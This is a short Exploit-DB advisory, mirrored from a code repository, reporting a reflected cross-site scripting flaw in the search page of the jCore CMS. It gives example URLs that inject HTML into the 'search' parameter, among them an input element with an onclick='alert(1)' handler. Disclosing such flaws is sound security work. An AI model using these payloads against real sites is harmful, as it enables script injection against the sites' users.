exploit-db-mirror/exploits/php/webapps/10531.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

15 lines
No EOL
496 B
Text

Found: loneferret
Vendor: jCore
Site: http://www.jcore.net/home
Software link: http://www.jcore.net/downloads
Search page is vulnerable to cross-site scripting.
Exploit:
http://server/modules/search?search=[xss here]
http://server/modules/search?search=</a>[xss here]
Example:
The result page will screw up. Hit the back button and you newly created
submit input type will be there. Fully functional.
http://server/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">